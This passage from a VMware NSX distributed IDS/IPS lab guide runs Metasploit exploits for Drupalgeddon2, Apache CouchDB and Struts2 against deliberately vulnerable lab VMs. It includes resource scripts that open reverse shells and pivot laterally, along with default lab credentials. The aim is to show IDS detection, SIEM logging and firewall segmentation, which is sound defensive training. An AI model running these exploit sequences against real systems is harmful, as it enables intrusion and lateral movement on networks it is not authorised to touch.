54 | [*] 192.168.10.0/24: - Scanned 28 of 256 hosts (10% complete)
55 | [*] 192.168.10.0/24: - Scanned 52 of 256 hosts (20% complete)
56 | [+] 192.168.10.100: - 192.168.10.100:5984 - TCP OPEN
57 | [+] 192.168.10.100: - 192.168.10.100:8080 - TCP OPEN
58 | [+] 192.168.10.101: - 192.168.10.101:5984 - TCP OPEN
59 | [+] 192.168.10.101: - 192.168.10.101:8080 - TCP OPEN
60 | [*] 192.168.10.0/24: - Scanned 77 of 256 hosts (30% complete)
61 | [*] 192.168.10.0/24: - Scanned 103 of 256 hosts (40% complete)
62 | [*] 192.168.10.0/24: - Scanned 129 of 256 hosts (50% complete)
63 | [*] 192.168.10.0/24: - Scanned 154 of 256 hosts (60% complete)
64 | [*] 192.168.10.0/24: - Scanned 180 of 256 hosts (70% complete)
65 | [*] 192.168.10.0/24: - Scanned 205 of 256 hosts (80% complete)
66 | [*] 192.168.10.0/24: - Scanned 233 of 256 hosts (91% complete)
67 | [*] 192.168.10.0/24: - Scanned 256 of 256 hosts (100% complete)
68 | [*] Auxiliary module execution completed
69 | ```
70 |
71 | > **Note**: To reduce the number of OVAs needed for this PoV, each workload VM deployed runs both a vulnerable **Drupal** and a vulnerable **CouchDB** service
72 |
73 | **Initiate DrupalGeddon2 attack against App1-WEB-TIER VM**
74 |
75 | In order to launch the **Drupalgeddon2** exploit against the **App1-WEB-TIER VM**, you can either manually configure the **Metasploit** module, or edit and run a pre-defined script. If you want to go with the script option, skip to step #3 and continue from there.
76 |
77 | 1. To initiate the attack manually, use the Metasploit console you opened earlier. Follow the below steps to initiate the exploit. Hit **enter** after every command.
78 | * Type **use exploit/unix/webapp/drupal_drupalgeddon2** to select the drupalgeddon2 exploit module
79 | * Type **set RHOST 192.168.10.101** to define the IP address of the victim to attack. The IP address should match the IP address of **App1-WEB-TIER VM**
80 | * Type **set RPORT 8080** to define the port the vulnerable Drupal service runs on.
81 | * Type **exploit** to initiate the exploit attempt
82 | 2. Skip steps #3 and #4, and continue with step #5
83 |
84 | ```console
85 |
86 | msf5 auxiliary(scanner/portscan/tcp) > use exploit/unix/webapp/drupal_drupalgeddon2
87 | [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
88 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOST 192.168.10.101
89 | RHOST => 192.168.10.101
90 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 8080
91 | RPORT => 8080
92 | msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
93 | ```
94 | 3. If you want to go with the script option instead, run **sudo nano attack1.rc** and type **VMware1!** when asked for the password.
95 | * Confirm that the **RHOST** line IP address matches with the IP address of **App1-WEB-TIER VM** you saw in the NSX VM Inventory.
96 | * Change this IP address if needed.
97 | * Save your changes and exit **nano**
98 | 4. Type **sudo ./attack1.sh** to initiate the Metasploit script and Drupalgeddon exploit (a sketch of the script contents is shown below). Next, go to step #6
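
> **Note**: For reference, **attack1.rc** is expected to simply wrap the Metasploit commands from the manual steps above in a resource script. A minimal sketch, assuming the same module and example IP address (adjust **RHOST** to match your **App1-WEB-TIER VM**; **-z** backgrounds the session, as the attack2 script does):

```console
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOST 192.168.10.101
set RPORT 8080
exploit -z
```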
99 |
100 | 5. Confirm the vulnerable server was successfully exploited and a **Meterpreter** reverse TCP session was established from **App1-WEB-TIER VM** back to the **External VM**
101 |
102 | ```console
103 | [*] Started reverse TCP handler on 10.114.209.151:4444
104 | [*] Sending stage (38288 bytes) to 192.168.10.101
105 | [*] Meterpreter session 1 opened (10.114.209.151:4444 -> 192.168.10.101:45032) at 2020-07-20 19:37:29 -0500
106 | ```
107 | 6. **Optionally**, you can now interact with the Meterpreter session. For instance, you can run the below commands to gain more information on the exploited **App1-WEB-TIER VM**
108 | * Type **sysinfo** to learn more about the running OS
109 |
110 | ```console
111 | meterpreter > sysinfo
112 | Computer : 273e1700c5be
113 | OS : Linux 273e1700c5be 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64
114 | Meterpreter : php/linux
115 | meterpreter > ?
116 | ```
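* **Optionally**, type **getuid** to see which user the compromised Drupal process runs as. Illustrative output (the **www-data** user matches what **sessions -l** reports later in this guide; your values may differ):

```console
meterpreter > getuid
Server username: www-data (33)
```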
117 | 7. When you are done, type **exit -z** to shut down the Meterpreter session
118 | 8. Type **exit** to exit Metasploit
119 |
120 | **Confirm IDS/IPS Events show up in the NSX Manager UI**
121 | 1. In the NSX Manager UI, navigate to Security --> Security Overview
122 | 2. Under the **Insights** tab, confirm you see a number of attempted intrusions against the **APP-1-WEB-TIER** workload
123 | 
124 | 3. Click **APP-1-WEB-TIER** to open a filtered event view for this workload.
125 | 4. Confirm 2 signatures have fired: one exploit-specific signature for **DrupalGeddon2** and one broad signature indicating **Remote Code Execution via a PHP script**
126 | 
127 | > **Note**: You can zoom in/out to specific times using the timeline slider, filter the Events view based on Severity by selecting the desired severities, or filter based on other criteria such as Attack Target, Attack Type, CVSS, Product Affected or VM Name by using the **Apply Filter** box.
128 | 5. Expand both of the events by clicking the **>** icon on the left side next to severity
129 | 6. For the **DrupalGeddon2** event:
130 | * Confirm that the IP addresses of the attacker and victim match the **External VM** and **APP-1-WEB-TIER VM** respectively.
131 | * Click **View Intrusion History** to see details about the exploit attempts. You may see multiple attempts (from different ports) as Metasploit initiated multiple connections.
132 | * This event contains vulnerability details including the **CVSS score** and **CVE ID**. Click the **2018-7600** CVE link to open up the **MITRE** CVE page and learn more about the vulnerability.
133 | 7. **Optionally**, you can check the above details as well for the secondary event (except for the vulnerability details, which are not applicable to this more general signature)
134 |
135 | > **Note**: **Product Affected** indicates the service vulnerable to the exploit a signature is detecting. In this case, you should see **Drupal_Server** as being vulnerable to the **DrupalGeddon2** exploit and **Web_server_Applications** being affected by the more generic **Remote Code Execution** attempt.
136 |
137 | > **Note**: **Attack Target** indicates the kind of service being attacked. This could be a client (in case of a client-side exploit), a server, etc. In this case, you should see **Web_server** as the attack target for both events.
138 |
139 | 8. In the **timeline** above, you can click the dots that represent each event to get summarized information.
140 |
141 | You have now successfully completed a simple attack scenario!
142 | In the next exercise, we will run through a more advanced scenario, in which we will move the attack beyond the initial exploit against the Drupal web-frontend to a database server running on the internal network, and then move laterally once again to another database server belonging to a different application. This is similar to real-world attacks, in which bad actors move within the network in order to get to the high-value assets/data they are after. The NSX Distributed IDS/IPS and Distributed Firewall are uniquely positioned at the vNIC of every workload to detect and prevent this lateral movement.
143 |
144 |
145 | Before moving to the next exercise, follow [these instructions](/docs/ClearingIDSEvents.md) to clear the IDS events from NSX Manager
146 |
147 | ---
148 |
149 | [***Next Step: 7. Lateral Movement Scenario***](/docs/7-LateralMovementScenario.md)
150 |
--------------------------------------------------------------------------------
/docs/8-AdvancedConfiguration-302.md:
--------------------------------------------------------------------------------
1 |
2 | ## 8. Advanced Attack and Configuration
3 | **Estimated Time to Complete: 60 minutes**
4 |
5 | In this **optional** exercise, we will explore some more advanced options in the NSX Distributed IDS/IPS Configuration:
6 | * Tuning IDS/IPS Profile to turn off irrelevant signatures
7 | * Enable IDS/IPS event logging directly from each host to a syslog collector/SIEM
8 |
9 | **Tuning IDS/IPS Profile to turn off irrelevant signatures**
10 |
11 | > **Note**: Within an IDS/IPS Profile, you can define exclusions in order to turn off particular signatures within the context of that profile. Reasons to exclude signatures include false positives and noisy or irrelevant signatures.
12 |
13 | 1. From the console session with **External VM**, type **sudo msfconsole** to launch **Metasploit**. Enter **VMware1!** if prompted for a password. Follow the below steps to initiate the exploit. Hit **enter** between every step.
14 | * Type **use exploit/multi/http/struts2_content_type_ognl** to select the Apache Struts2 exploit module
15 | * Type **set RHOST 192.168.10.101** to define the IP address of the victim to attack. The IP address should match the IP address of **App1-WEB-TIER VM**
16 | * Type **exploit** to initiate the exploit.
17 |
18 | > **Note**: This exploit will fail as **App1-WEB-TIER VM** is not running an Apache Struts service vulnerable to this exploit.
19 |
20 | ```console
21 | msf5 > use exploit/multi/http/struts2_content_type_ognl
22 | [*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
23 | msf5 exploit(multi/http/struts2_content_type_ognl) > set RHOST 192.168.10.101
24 | RHOST => 192.168.10.101
27 | msf5 exploit(multi/http/struts2_content_type_ognl) > exploit
28 |
29 | [*] Started reverse TCP handler on 10.114.209.151:4444
30 | [-] Exploit aborted due to failure: bad-config: Server returned HTTP 404, please double check TARGETURI
31 | [*] Exploit completed, but no session was created.
32 | msf5 exploit(multi/http/struts2_content_type_ognl) >
33 | ```
34 | 2. In NSX Manager, navigate to Security --> East West Security --> Distributed IDS --> Events
35 | 3. Confirm 3 signatures have fired:
36 | * ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638)
37 | * ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M2
38 | * ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M3
39 | 
40 | 4. Note that the **affected product** for all these events is **Apache_Struts2** and the severity for all events is **high**.
41 | 5. Now we will turn off these signatures for the **Production** profile as we are not running **Apache_Struts2** in our production environment.
42 | 6. In NSX Manager, navigate to Security --> East West Security --> Distributed IDS --> Profiles
43 | 7. Click the **3 dots** next to the **Production** profile and click **Edit** to edit the profile.
44 | 8. Click **Select** next to **High Severity Signatures**
45 | 9. In the **Filter** field, type **Apache_Struts2** to find all signatures related to Struts2. Tick the **checkbox** at the top of the exclusion screen to select all filtered signatures.
46 | 
47 | 10. Click **Add** to add the selected signatures to the exclusion list for the **Production** profile.
48 | 11. Click **Save** to save the **Production** profile.
49 |
50 | Now that we have tuned our Profile, we will try the failed exploit attempt again, and confirm this time the signatures don't fire.
51 |
52 | 12. From the already open console session with **External VM**, use the already configured **struts2_content_type_ognl** Metasploit module to launch the exploit attempt again.
53 | * Type **exploit** to initiate the exploit. If you had previously closed Metasploit, then repeat step #1 of this exercise instead to launch the exploit attempt
54 | 13. In NSX Manager, navigate to Security --> East West Security --> Distributed IDS --> Events
55 | 14. Confirm the total number of events or the number of times each **Apache_Struts2** signature fired has not increased.
56 | 
57 | 15. You have now completed this exercise.
58 |
59 | **Enable IDS/IPS event logging directly from each host to a syslog collector/SIEM**
60 |
61 | > **Note**: In addition to the IDS/IPS events sent to NSX Manager by each distributed IDS/IPS engine, you can send events directly to a syslog collector or SIEM from each host. Events are sent in the EVE.JSON format, for which many SIEMs have pre-existing parsers/dashboards.
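
For illustration, a single exported IDS event in EVE.JSON format looks broadly like the below sketch. The field names follow the common EVE alert schema; all values are made-up examples, and the exact fields may vary by NSX version:

```console
{
  "timestamp": "2020-07-20T19:37:29.000-0500",
  "event_type": "alert",
  "src_ip": "10.114.209.151",
  "src_port": 40872,
  "dest_ip": "192.168.10.101",
  "dest_port": 8080,
  "proto": "TCP",
  "alert": {
    "action": "allowed",
    "signature_id": 1234567,
    "signature": "<signature name>",
    "category": "Web Application Attack",
    "severity": 1
  }
}
```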
62 |
63 | In this exercise, you will learn how to configure IDS event export from each host to your syslog collector or SIEM of choice. I will use **vRealize Log Insight**; you can use the same or your own SIEM of choice.
64 | We will not cover how to install **vRealize Log Insight** or any other logging platform, but the following steps will cover how to send IDS/IPS events to an already configured collector.
65 |
66 | 1. Login to the lab vCenter and click on **Hosts and Clusters**, then select one of the 3 hosts that were deployed.
67 | 2. Click the **Configure** Tab and Scroll down to **System**. Click **Advanced System Settings**
68 | 3. Click the **Edit** button
69 | 4. In the **Filter** field, type **loghost**
70 | 5. Enter the **IP address of your syslog server** in the **Syslog.global.logHost** value field and click **OK** to confirm.
71 | 
72 | 6. Repeat the same for the remaining 2 hosts.
73 | 7. Click on **Firewall** in the same **System** menu
74 | 8. Click the **Edit** button
75 | 9. In the **Filter** field, type **syslog**
76 | 10. Tick the checkbox next to **syslog** to allow outbound syslog from the host.
77 | 11. Repeat the same for the remaining 2 hosts.
78 | 
79 | 12. Open a terminal session to one of the lab hypervisors, login with **root**/**VMware1!** and execute the below commands to enable IDS log export via syslog
80 | * Type **nsxcli** to enter the NSX CLI on the host
81 | * Type **set ids engine syslogstatus enable** to enable syslog event export
82 | * Confirm syslog event export was successfully enabled by running the command **get ids engine syslogstatus**
83 |
84 | ```console
85 | [root@localhost:~] nsxcli
86 | localhost> set ids engine syslogstatus enable
87 | result: success
88 |
89 | localhost> get ids engine syslogstatus
90 | NSX IDS Engine Syslog Status Setting
91 | --------------------------------------------------
92 | true
93 | ```
94 | 13. Login to your syslog collector/SIEM and confirm you are receiving logs from each host.
95 | 14. Configure a parser or a filter to only look at IDS events. You can, for example, filter on the string **IDPS_EVT**.
96 | 
97 | 15. Now we will run the lateral attack scenario we used in an earlier exercise again. This time, use the pre-defined script to run the attack instead of manually configuring the **Metasploit modules**.
98 | 16. Before you execute the script, if you have not previously used it, you need to ensure the IP addresses match your environment. Type **sudo nano attack2.rc** and replace the **RHOST** and **LHOST** IP addresses to match the IP addresses in your environment (a sketch of the script follows this list).
99 | * **RHOST** on line 3 should be the IP address of the App1-WEB-TIER VM
100 | * **SUBNET** on line 6 (route add) should be the Internal Network subnet
101 | * **LHOST** on line 9 should be the IP address of the External VM (this local machine)
102 | * **RHOST** on line 10 should be the IP address of the App1-APP-TIER VM, and **RHOST** on line 13 should be the IP address of the App2-APP-TIER VM
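
Based on the **resource (attack2.rc)>** commands the script echoes when it runs, **attack2.rc** is expected to look broadly like the below sketch; the line numbers referenced above line up if a blank line follows the first **use** statement. All IP addresses are examples and must match your environment:

```console
use exploit/unix/webapp/drupal_drupalgeddon2

set RHOST 192.168.10.101
set RPORT 8080
exploit -z
route add 192.168.20.0/24 1
use exploit/linux/http/apache_couchdb_cmd_exec
set LPORT 4445
set LHOST 10.114.209.151
set RHOST 192.168.20.100
exploit -z
set LPORT 4446
set RHOST 192.168.20.101
exploit -z
```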
103 | 17. After saving your changes, run the attack2 script by executing **sudo ./attack2.sh**.
104 | 18. Confirm a total of 3 meterpreter/command shell sessions have been established
105 | 19. Confirm your syslog server/SIEM has received the IDS events, directly from the host
106 | 
107 |
108 | This completes this exercise.
109 |
110 | ---
111 |
112 | [***Next Step: 9. Segmentation***](/docs/9-Segmentation.md)
113 |
--------------------------------------------------------------------------------
/docs/8-AdvancedConfiguration.md:
--------------------------------------------------------------------------------
1 |
2 | ## 8. Advanced Configuration
3 | **Estimated Time to Complete: 30 minutes**
4 |
5 | In this **optional** exercise, we will explore some more advanced options in the NSX Distributed IDS/IPS Configuration.
6 |
7 | **Enable IDS/IPS event logging directly from each host to a syslog collector/SIEM**
8 |
9 | > **Note**: In addition to the IDS/IPS events sent to NSX Manager by each distributed IDS/IPS engine, you can send events directly to a syslog collector or SIEM from each host. Events are sent in the EVE.JSON format, for which many SIEMs have pre-existing parsers/dashboards.
10 |
11 | In this exercise, you will learn how to configure IDS event export from each host to your syslog collector or SIEM of choice. I will use **vRealize Log Insight**; you can use the same or your own SIEM of choice.
12 | We will not cover how to install **vRealize Log Insight** or any other logging platform, but the following steps will cover how to send IDS/IPS events to an already configured collector.
13 |
14 | 1. Login to the lab vCenter and click on **Hosts and Clusters**, then select one of the 3 hosts that were deployed.
15 | 2. Click the **Configure** Tab and Scroll down to **System**. Click **Advanced System Settings**
16 | 3. Click the **Edit** button
17 | 4. In the **Filter** field, type **loghost**
18 | 5. Enter the **IP address of your syslog server** in the **Syslog.global.logHost** value field and click **OK** to confirm.
19 | 
20 | 6. Repeat the same for the remaining 2 hosts.
21 | 7. Click on **Firewall** in the same **System** menu
22 | 8. Click the **Edit** button
23 | 9. In the **Filter** field, type **syslog**
24 | 10. Tick the checkbox next to **syslog** to allow outbound syslog from the host.
25 | 11. Repeat the same for the remaining 2 hosts.
26 | 
27 | 12. Open a terminal session to one of the lab hypervisors, login with **root**/**VMware1!** and execute the below commands to enable IDS log export via syslog
28 | * Type **nsxcli** to enter the NSX CLI on the host
29 | * Type **set ids engine syslogstatus enable** to enable syslog event export
30 | * Confirm syslog event export was successfully enabled by running the command **get ids engine syslogstatus**
31 |
32 | ```console
33 | [root@localhost:~] nsxcli
34 | localhost> set ids engine syslogstatus enable
35 | result: success
36 |
37 | localhost> get ids engine syslogstatus
38 | NSX IDS Engine Syslog Status Setting
39 | --------------------------------------------------
40 | true
41 | ```
42 | 13. Login to your syslog collector/SIEM and confirm you are receiving logs from each host.
43 | 14. Configure a parser or a filter to only look at IDS events. You can, for example, filter on the string **IDPS_EVT**.
44 | 
45 | 15. Now we will run the lateral attack scenario we used in an earlier exercise again. This time, use the pre-defined script to run the attack instead of manually configuring the **Metasploit modules**.
46 | 16. Before you execute the script, if you have not previously used it, you need to ensure the IP addresses match your environment. Type **sudo nano attack2.rc** and replace the **RHOST** and **LHOST** IP addresses to match the IP addresses in your environment.
47 | * **RHOST** on line 3 should be the IP address of the App1-WEB-TIER VM
48 | * **SUBNET** on line 6 (route add) should be the Internal Network subnet
49 | * **LHOST** on line 9 should be the IP address of the External VM (this local machine)
50 | * **RHOST** on line 10 should be the IP address of the App1-APP-TIER VM, and **RHOST** on line 13 should be the IP address of the App2-APP-TIER VM
51 | 17. After saving your changes, run the attack2 script by executing **sudo ./attack2.sh**.
52 | 18. Confirm a total of 3 meterpreter/command shell sessions have been established
53 | 19. Confirm your syslog server/SIEM has received the IDS events, directly from the host
54 | 
55 |
56 | This completes this exercise. Before moving to the next exercise, follow [these instructions](/docs/ClearingIDSEvents.md) to clear the IDS events from NSX Manager
57 |
58 | ---
59 |
60 | [***Next Step: 9. Segmentation***](/docs/9-Segmentation.md)
61 |
--------------------------------------------------------------------------------
/docs/9-Segmentation.md:
--------------------------------------------------------------------------------
1 |
2 | ## 9. Segmentation
3 | **Estimated Time to Complete: 60 minutes**
4 |
5 | In this final exercise, we will leverage the **Distributed Firewall** in order to limit the attack surface.
6 | First, we will apply a **Macro-segmentation** policy which will isolate our **Production** environment and the applications deployed in it from the **Development** environment.
7 | Then, we will implement a **Micro-segmentation** policy, which will employ an **allow-list** to only allow the flows required for our applications to function and block everything else.
8 |
9 | **Macro-Segmentation: Isolating the Production and Development environments**
10 |
11 | The goal of this exercise is to completely isolate workloads deployed in **Production** from workloads deployed in **Development**. All nested workloads were previously tagged to identify which of these environments they were deployed in, and earlier in this lab, you created groups for **Production Applications** and **Development Applications** respectively. In the next few steps, you will create the appropriate firewall rules to achieve this, and then run through the **lateral movement** attack scenario again to see how lateral movement has now been limited to a particular environment.
12 |
13 | ***Create a Distributed Firewall Environment Category Policy***
14 | 1. In the NSX Manager UI, navigate to Security --> Distributed Firewall
15 | 2. Click on the **Environments(0)** Category tab.
16 | 3. Click **ADD POLICY**
17 | 4. Click **New Policy** and change the name of the policy to **Environment Isolation**
18 | 5. Check the checkbox next to the **Environment Isolation** Policy
19 | 6. Click **ADD RULE** twice, and configure the new rules as per the below steps
20 | 7. Rule 1
21 | * Name: **Isolate Production-Development**
22 | * Source: **Production Applications**
23 | * Destination: **Development Applications**
24 | * Services: **ANY**
25 | * Profiles: **NONE**
26 | * Applied To: **Production Applications** , **Development Applications**
27 | * Action: **Drop**
28 | 8. Rule 2
29 | * Name: **Isolate Development-Production**
30 | * Source: **Development Applications**
31 | * Destination: **Production Applications**
32 | * Services: **ANY**
33 | * Profiles: **NONE**
34 | * Applied To: **Production Applications** , **Development Applications**
35 | * Action: **Drop**
36 |
37 | 
38 |
39 | 9. Click **Publish** to publish these rules to the **Distributed Firewall**.
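
For reference, the same policy can also be created programmatically through the NSX Policy API. The below is a sketch of the first rule only (the second rule mirrors it with source and destination swapped); the group paths are assumptions that depend on the IDs your groups were created with:

```console
curl -k -u admin -X PATCH \
  https://<nsx-manager>/policy/api/v1/infra/domains/default/security-policies/environment-isolation \
  -H 'Content-Type: application/json' -d '{
    "display_name": "Environment Isolation",
    "category": "Environment",
    "rules": [{
      "resource_type": "Rule",
      "display_name": "Isolate Production-Development",
      "source_groups": ["/infra/domains/default/groups/production-applications"],
      "destination_groups": ["/infra/domains/default/groups/development-applications"],
      "services": ["ANY"],
      "scope": ["/infra/domains/default/groups/production-applications",
                "/infra/domains/default/groups/development-applications"],
      "action": "DROP"
    }]
  }'
```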
40 |
41 | ***Open a SSH/Console session to the External VM***
42 | 1. If your computer has access to the IP address you've assigned to the **External VM** (10.114.209.151 in my example), open your ssh client and initiate a session to it. Login with the below credentials.
43 | * Username **vmware**
44 | * Password **VMware1!**
45 | 2. **Alternatively**, if your computer does not have access to the **External VM** directly, you can access the VM console from the physical environment vCenter Web-UI.
46 |
47 | ***Run through the lateral attack scenario (again)***
48 |
49 | In order to reduce the time needed for this, you can run the **attack2** script from the **external VM**, which will initiate the complete lateral attack scenario without needing any manual Metasploit steps. If you prefer, you can also manually go through these steps (see the chapter on the Lateral Movement Scenario)
50 |
51 | 1. If you have not previously used this script, you will need to modify it to reflect your environment. Type **sudo nano attack2.rc** and replace the **RHOST** and **LHOST** IP addresses accordingly to match with the IP addresses in your environment.
52 | * **RHOST** on line 3 should be the IP address of the App1-WEB-TIER VM
53 | * **SUBNET** on line 6 (route add) should be the Internal Network subnet
54 | * **LHOST** on line 9 should be the IP address of the External VM (this local machine)
55 | * **RHOST** on line 10 should be the IP address of the App1-APP-TIER VM
56 | * **RHOST** on line 13 should be the IP address of the App2-APP-TIER VM
57 | 2. Type **CTRL-O** and confirm to save your changes, then **CTRL-X** to exit **Nano**.
58 | 3. Type **sudo ./attack2.sh** to run the attack scenario
59 |
60 | > **Note**: This scripted attack does not upgrade shell sessions to Meterpreter sessions, nor does it interact with the established sessions, but it will cause the same signatures to fire on the NSX IDS/IPS.
61 |
62 | ```console
63 |
64 | vmware@ubuntu:~$ sudo ./attack2.sh
65 | [sudo] password for vmware:
66 | [*] Starting thE Metasploit Framework console...\
67 |
68 | Call trans opt: received. 2-19-98 13:24:18 REC:Loc
69 |
70 | Trace program: running
71 |
72 | wake up, Neo...
73 | the matrix has you
74 | follow the white rabbit.
75 |
76 | knock, knock, Neo.
77 |
78 | (`. ,-,
79 | ` `. ,;' /
80 | `. ,'/ .'
81 | `. X /.'
82 | .-;--''--.._` ` (
83 | .' / `
84 | , ` ' Q '
85 | , , `._ \
86 | ,.| ' `-.;_'
87 | : . ` ; ` ` --,.._;
88 | ' ` , ) .'
89 | `._ , ' /_
90 | ; ,''-,;' ``-
91 | ``-..__``--`
92 |
93 | https://metasploit.com
94 |
95 |
96 | =[ metasploit v5.0.95-dev ]
97 | + -- --=[ 2038 exploits - 1103 auxiliary - 344 post ]
98 | + -- --=[ 562 payloads - 45 encoders - 10 nops ]
99 | + -- --=[ 7 evasion ]
100 |
101 | Metasploit tip: Search can apply complex filters such as search cve:2009 type:exploit, see all the filters with help search
102 |
103 | [*] Processing attack2.rc for ERB directives.
104 | resource (attack2.rc)> use exploit/unix/webapp/drupal_drupalgeddon2
105 | [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
106 | resource (attack2.rc)> set RHOST 192.168.10.101
107 | RHOST => 192.168.10.101
108 | resource (attack2.rc)> set RPORT 8080
109 | RPORT => 8080
110 | resource (attack2.rc)> exploit -z
111 | [*] Started reverse TCP handler on 10.114.209.151:4444
112 | [*] Sending stage (38288 bytes) to 192.168.10.101
113 | [*] Meterpreter session 1 opened (10.114.209.151:4444 -> 192.168.10.101:36632) at 2020-08-18 09:23:54 -0500
114 | [*] Session 1 created in the background.
115 | resource (attack2.rc)> route add 192.168.20.0/24 1
116 | [*] Route added
117 | resource (attack2.rc)> use exploit/linux/http/apache_couchdb_cmd_exec
118 | [*] Using configured payload linux/x64/shell_reverse_tcp
119 | resource (attack2.rc)> set LPORT 4445
120 | LPORT => 4445
121 | resource (attack2.rc)> set LHOST 10.114.209.151
122 | LHOST => 10.114.209.151
123 | resource (attack2.rc)> set RHOST 192.168.20.100
124 | RHOST => 192.168.20.100
125 | resource (attack2.rc)> exploit -z
126 | [*] Started reverse TCP handler on 10.114.209.151:4445
127 | [*] Generating curl command stager
128 | [*] Using URL: http://0.0.0.0:8080/4u4h7sj6qJrKq
129 | [*] Local IP: http://10.114.209.151:8080/4u4h7sj6qJrKq
130 | [*] 192.168.20.100:5984 - The 1 time to exploit
131 | [*] Client 10.114.209.148 (curl/7.38.0) requested /4u4h7sj6qJrKq
132 | [*] Sending payload to 10.114.209.148 (curl/7.38.0)
133 | [*] Command shell session 2 opened (10.114.209.151:4445 -> 10.114.209.148:20667) at 2020-08-18 09:24:20 -0500
134 | [+] Deleted /tmp/zzdlnybu
135 | [+] Deleted /tmp/ltvyozbf
136 | [*] Server stopped.
137 | [*] Session 2 created in the background.
138 | resource (attack2.rc)> set LPORT 4446
139 | LPORT => 4446
140 | resource (attack2.rc)> set RHOST 192.168.20.101
141 | RHOST => 192.168.20.101
142 | resource (attack2.rc)> exploit -z
143 | [*] Started reverse TCP handler on 10.114.209.151:4446
144 | [-] Exploit aborted due to failure: unknown: Something went horribly wrong and we couldn't continue to exploit.
145 | [*] Exploit completed, but no session was created.
146 | ```
147 |
148 | 4. Type **sessions -l** to confirm that this time, although the script tried to exploit the **APP1-WEB-TIER**, then laterally move to **APP1-APP-TIER**, and then move once more to **APP2-APP-TIER**, only 2 reverse shell sessions were established
149 | * One from the **APP1-WEB-TIER** VM
150 | * One from the **APP1-APP-TIER** VM
151 |
152 | > **Note**: The exploit of the **APP2-APP-TIER** VM failed, because the Distributed Firewall policy you just configured isolated the **APP2** workloads that are part of the **Development Applications** Group (Zone) from the **APP1** workloads which are part of the **Production Applications** Group (Zone).
153 |
154 | ```console
155 | msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions -l
156 |
157 | Active sessions
158 | ===============
159 |
160 | Id Name Type Information Connection
161 | -- ---- ---- ----------- ----------
162 | 1 meterpreter php/linux www-data (33) @ 273e1700c5be 10.114.209.151:4444 -> 192.168.10.101:36632 (192.168.10.101)
163 | 2 shell x64/linux 10.114.209.151:4445 -> 10.114.209.148:20667 (192.168.20.100)
164 | ```
165 |
166 | ***Confirm IDS/IPS Events show up in the NSX Manager UI***
167 | 1. In the NSX Manager UI, navigate to Security --> East West Security --> Distributed IDS
168 | 2. Confirm 4 signatures have fired:
169 | * Signature for **DrupalGeddon2**, with **APP-1-WEB-TIER** as Affected VM
170 | * Signature for **Remote Code execution via a PHP script**, with **APP-1-WEB-TIER** as Affected VM
171 | * Signature for **Apache CouchDB Remote Code Execution**, with **APP-1-WEB-TIER** and **APP-1-APP-TIER** as Affected VMs
172 | * Signature for **Apache CouchDB Remote Privilege Escalation**, with **APP-1-WEB-TIER** and **APP-1-APP-TIER** as Affected VMs
173 |
174 | 
175 |
176 | > **Note**: Because the distributed firewall has isolated production from development workloads, we do not see the exploit attempt of the **APP2-APP-TIER** VM.
177 |
178 | This completes the Macro-segmentation exercise. Before moving to the next exercise, follow [these instructions](/docs/ClearingIDSEvents.md) to clear the IDS events from NSX Manager
179 |
180 | **Micro-Segmentation: Implementing a zero-trust network architecture for your applications**
181 |
182 | Now that we have isolated production from development workloads, we will micro-segment both of our applications by configuring an **allow-list** policy which explicitly allows only the flows required for our applications to function and blocks anything else. As a result, we will not only prevent lateral movement, but also prevent any reverse shell from being established.
183 |
184 | ***Create Granular Groups***
185 | 1. In the NSX Manager UI, navigate to Inventory --> Groups
186 | 2. Click **ADD GROUP**
187 | 3. Create a Group with the below parameters. Click Apply when done. (A sketch of the equivalent API call follows the membership check below.)
188 | * Name **APP1-WEB**
189 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals APP-1 Scope Application** AND **Virtual Machine Tag Equals Web-Tier Scope Tier** (click the **+** icon to specify the **AND** condition between the criteria).
190 | 
191 | 4. Create another Group with the below parameters. Click Apply when done.
192 | * Name **APP1-APP**
193 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals APP-1 Scope Application** AND **Virtual Machine Tag Equals App-Tier Scope Tier** (click the **+** icon to specify the **AND** condition between the criteria).
194 | 5. Create another Group with the below parameters. Click Apply when done.
195 | * Name **APP2-WEB**
196 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals APP-2 Scope Application** AND **Virtual Machine Tag Equals Web-Tier Scope Tier** (click the **+** icon to specify the **AND** condition between the criteria).
197 | 6. Create another Group with the below parameters. Click Apply when done.
198 | * Name **APP2-APP**
199 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals APP-2 Scope Application** AND **Virtual Machine Tag Equals App-Tier Scope Tier** (click the **+** icon to specify the **AND** condition between the criteria).
200 |
201 | 7. Confirm previously deployed VMs became members of the appropriate groups due to the applied tags. Click **View Members** for the 4 groups you created and confirm:
202 | * Members of **APP1-WEB**: **APP-1-WEB-TIER**
203 | * Members of **APP1-APP**: **APP-1-APP-TIER**.
204 | * Members of **APP2-WEB**: **APP-2-WEB-TIER**
205 | * Members of **APP2-APP**: **APP-2-APP-TIER**.
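
For reference, tag-based groups like these can also be defined through the NSX Policy API. A sketch for **APP1-WEB**, assuming the UI criteria translate to two tag conditions joined by AND (the **scope|tag** value format and the group ID are assumptions to verify against your NSX version):

```console
curl -k -u admin -X PATCH \
  https://<nsx-manager>/policy/api/v1/infra/domains/default/groups/APP1-WEB \
  -H 'Content-Type: application/json' -d '{
    "display_name": "APP1-WEB",
    "expression": [
      { "resource_type": "Condition", "member_type": "VirtualMachine",
        "key": "Tag", "operator": "EQUALS", "value": "Application|APP-1" },
      { "resource_type": "ConjunctionOperator", "conjunction_operator": "AND" },
      { "resource_type": "Condition", "member_type": "VirtualMachine",
        "key": "Tag", "operator": "EQUALS", "value": "Tier|Web-Tier" }
    ]
  }'
```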
206 |
207 | ***Create a Distributed Firewall Application Category Policy***
